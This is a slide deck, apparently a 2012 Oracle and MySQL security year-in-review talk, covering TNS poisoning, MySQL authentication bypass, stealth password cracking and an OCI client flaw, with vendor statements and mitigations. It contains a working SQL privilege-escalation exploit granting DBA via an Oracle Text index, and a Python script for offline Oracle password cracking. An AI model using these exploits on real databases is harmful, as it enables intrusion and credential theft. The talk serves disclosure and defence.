![Page 59: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/59.jpg)
Attacker Listener
Victim
Logon
![Page 60: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/60.jpg)
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
![Page 61: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/61.jpg)
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
![Page 62: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/62.jpg)
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
Attacker is now manin the middle (MITM)
![Page 63: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/63.jpg)
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
![Page 64: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/64.jpg)
Attacker ListenerRedirect Network Traffic of the victim
Forward to the database again
![Page 65: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/65.jpg)
TNS Poisoning - Statements Oracle*
• Oracle: „The fix is very complex and it is extremely
risky to backport.“
• Oracle: „This fix is in a sensitive part of our code where
regressions are a concern.„
• Oracle: „Customers have requested that Oracle not
include such security fixes into Critical Patch Updates
that increases the chance of regressions.“
• Oracle: „To protect the interest of our customers, we
do not provide these level of details (like versions
affected) for the issues that are addressed as in-
depth. The future releases will have the fix.“
* http://seclists.org/fulldisclosure/2012/Apr/343
![Page 66: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/66.jpg)
TNS Poisoning - Statement Researcher *
• Joxean: „So, as previously stated, this is a 0day
vulnerability with no patch, Oracle refuses to patch
the vulnerability in *any* existing version and Oracle
refuses to give details about which versions will have
the fix. But they say the vulnerability is fixed. Cool.“
* http://seclists.org/fulldisclosure/2012/Apr/343
![Page 67: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/67.jpg)
TNS Poisoning - Workarounds
• There are different workarounds available (COSTS
parameter, dynamic registration, restricted_nodes)
• There 2 documents for non-RAC and RAC systems
available in Oracle MyOracleSupport (1453883.1 ,
1340831.1) describing the workarounds
• Testing is necessary to avoid side-effects (e.g. Grid-
Control, ip restriction sqlnet.ora & IPC)
• set dynamic_registration=off
![Page 68: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/68.jpg)
MySQL - Password Problem*,**
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
![Page 69: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/69.jpg)
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
![Page 70: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/70.jpg)
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
! Pwnie for Best Server-Side Bug
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
![Page 71: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/71.jpg)
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
! Pwnie for Best Server-Side Bug
! Free Scanner/Script to abuse this vulnerability available **
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
![Page 72: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/72.jpg)
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"
! Pwnie for Best Server-Side Bug
! Free Scanner/Script to abuse this vulnerability available **
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
![Page 73: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/73.jpg)
May 2012
• nothing special happened
![Page 74: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/74.jpg)
June 2012
• nothing special happened
![Page 75: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/75.jpg)
July 2012
• Oracle CPU July 2012 *
* http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
![Page 76: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/76.jpg)
July 2012 CPU*
• 4 security fixes (3 remote exploitable)
• Core RDBMS
• Enterprise Manager
• Network Layer
• Hidden Security bug in Oracle Text (Blackhat
0day) was fixed without being mentioned.
• Fixing security bugs without documenting it, is a
common Oracle practice.
![Page 77: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/77.jpg)
August 2012
• 0day privilege escalation exploit
(CVE-2012-3132) for Oracle 11g released at
BlackHat 2012 Las Vegas *
• Out-of-Band Patch for Oracle **
(„Oracle Database Server versions 11.2.0.2 and
11.2.0.3 do not require patching if the July 2012
Critical Patch Update has been applied.“)
* http://www.slaviks-blog.com/2012/08/03/another-blackhat-another-oracle-0day/** http://www.oracle.com/technetwork/topics/security/alert-cve-2012-3132-1721017.html
![Page 78: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/78.jpg)
![Page 79: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/79.jpg)
connect blackhat/password
set role dba; -- throws an error
create or replace function X return varchar authid current_user ispragma autonomous_transaction;beginexecute immediate 'GRANT DBA TO BLACKHAT';commit;return 'FOO';END;/
grant execute on X to public;
create table pwnoracle (id number(20) not null, "FOO'||BLACKHAT.X||'BAR" BLOB);
create index i_pwnoracle on pwnoracle("FOO'||BLACKHAT.X||'BAR") indextype is ctxsys.context;
exec dbms_stats.gather_table_stats(USER,'PWNORACLE',cascade=>TRUE);
drop table pwnoracle;
set role dba;
![Page 80: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/80.jpg)
September 2012• Stealth Password Cracking Exploit released
• Cleartext passwords at OCI Client Side
• Metasploit/Meterpreter Modules for
• TNS Poisoning
• Get Cleartext passwords clientside
• Get Cleartext passwords serverside
• Run OS Commands (via oradebug)
• Side Channel attack on ORA-00942
![Page 81: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/81.jpg)
Stealth Password Cracking! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *
! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue
! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts
! Incomplete Logon is not audited
! Oracle did not fix this problem. They removed the OLogon 11 Protocol if CPU October 2012 applied and recommend using the old DES hashes.==> this could cause compatibility problems with clients < 11.2.0.3
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
![Page 82: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/82.jpg)
Stealth Password Cracking! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *
! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue
! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts
! Incomplete Logon is not audited
! Oracle did not fix this problem. They removed the OLogon 11 Protocol if CPU October 2012 applied and recommend using the old DES hashes.==> this could cause compatibility problems with clients < 11.2.0.3
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
UNFIXED
![Page 83: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/83.jpg)
Stealth Password Cracking I
![Page 84: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/84.jpg)
Stealth Password Cracking I
Attacker
![Page 85: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/85.jpg)
Stealth Password Cracking I
Attacker
![Page 86: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/86.jpg)
Stealth Password Cracking I
Attacker1.) Logon: SYSTEM
![Page 87: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/87.jpg)
Stealth Password Cracking I
Attacker
![Page 88: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/88.jpg)
Stealth Password Cracking I
Attacker
![Page 89: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/89.jpg)
Stealth Password Cracking I
Attacker
2.) Get Hash and Salt of User SYSTEM (USER$.SPARE4)
![Page 90: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/90.jpg)
Stealth Password Cracking I
Attacker
2.) Get Hash and Salt of User SYSTEM (USER$.SPARE4)
3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08
![Page 91: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/91.jpg)
Stealth Password Cracking I
Attacker
3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08
![Page 92: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/92.jpg)
Stealth Password Cracking I
Attacker
![Page 93: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/93.jpg)
Stealth Password Cracking I
Attacker
4.) Send Salt + encrypted Session Key
![Page 94: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/94.jpg)
Stealth Password Cracking I
Attacker
![Page 95: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/95.jpg)
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
![Page 96: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/96.jpg)
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
![Page 97: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/97.jpg)
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)
![Page 98: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/98.jpg)
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)
8.) Check if decrypted results contains\x08\x08\x08\x08\x08\x08\x08\x08
![Page 99: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/99.jpg)
Stealth Password Cracking I
Attacker
5.) Stop logon process(no PW sent -> not invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)
8.) Check if decrypted results contains\x08\x08\x08\x08\x08\x08\x08\x08
9.) If true then password foundelse try a new password
![Page 100: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/100.jpg)
Stealth Password Cracking II
! Attacker sends an username (e.g. SYSTEM) without a password to the database
! The database reads the password hash of the user SYSTEM
! A newly generated session key is padded with \x08\x08\x08\x08\x08\x08\x08\x08
! The result is encrypted (AES) with the password salt of the user
! The encrypted session key + the salt is sent to the attacker
! Attacker stops the login process
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
![Page 101: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/101.jpg)
Stealth Password Cracking III
! Attacker now generate SHA1 hashes for common passwords using the salt received from the database
! This hash is used to decrypt the received session key
! If the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08 the password is known
![Page 102: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/102.jpg)
Pseudo-Code! users.txt (list of common users)
dict.txt (common passwords)
! for all entries in users.txt do result:=send_logon_paket(USERNAME) if result contains a salt -- we found a valid user do for all passwords in dict.txt do hash:=sha1(password||salt) decres:=decrypt_aes(session_key,hash) if decres contains \x08\x08\x08\x08 then print „password found“ od od od
! Thousands of (local) tests could be done in a second.Only 1 network packet per username
![Page 103: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/103.jpg)
import hashlib from Crypto.Cipher import AES
def decrypt(session,salt,password): pass_hash = hashlib.sha1(password+salt)
key = pass_hash.digest() + '\x00\x00\x00\x00' decryptor = AES.new(key,AES.MODE_CBC) plain = decryptor.decrypt(session) return plain
session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
salt_hex = 'A7193E546377EC56639E'
passwords = ['test','password','oracle','demo']
for password in passwords: session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password) print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex')) if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08': print 'PASSWORD IS "%s"' % password break
![Page 104: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/104.jpg)
Stealth Password Cracking II
! Tools already exist (John the Ripper)
! Up to 1 Million passwords/second tests
![Page 105: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/105.jpg)
Mitigation of the problem
! (No Patch) Switch back to the old DES password hashes by using the parameter
SEC_CASE_SENSITIVE_LOGON=FALSE
! Oracle October 2012 CPU removes the vulnerable protocol and automatically switch back to Ologon V10
! Set
sqlnet.allowed_logon_version=12
to Ologon Protocol V12. This requires 11.2.0.3 client
![Page 106: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/106.jpg)
DerbyCon / Hacktivity Presentation of László Tóth and Ferenc Spala
! Presentation about database security without SQL Injection
! New flaw in the OCI driver
! Presentation of tools for Metasploit to run os commands, abuse the TNS poisoning bug and get cleartext passwords (server and client).
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 107: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/107.jpg)
OCI Driver & Database Password
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 108: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/108.jpg)
OCI Driver & Database Password
! Flaw in the OCI driver
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 109: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/109.jpg)
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 110: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/110.jpg)
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 111: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/111.jpg)
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 112: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/112.jpg)
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 113: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/113.jpg)
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
! No workaround/fix is available
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
![Page 114: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/114.jpg)
OCI Driver & Database Password
! Flaw in the OCI driver
! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.
! Even if the database session is closed the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
! No workaround/fix is available
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
UNFIXED
![Page 115: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/115.jpg)
![Page 116: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/116.jpg)
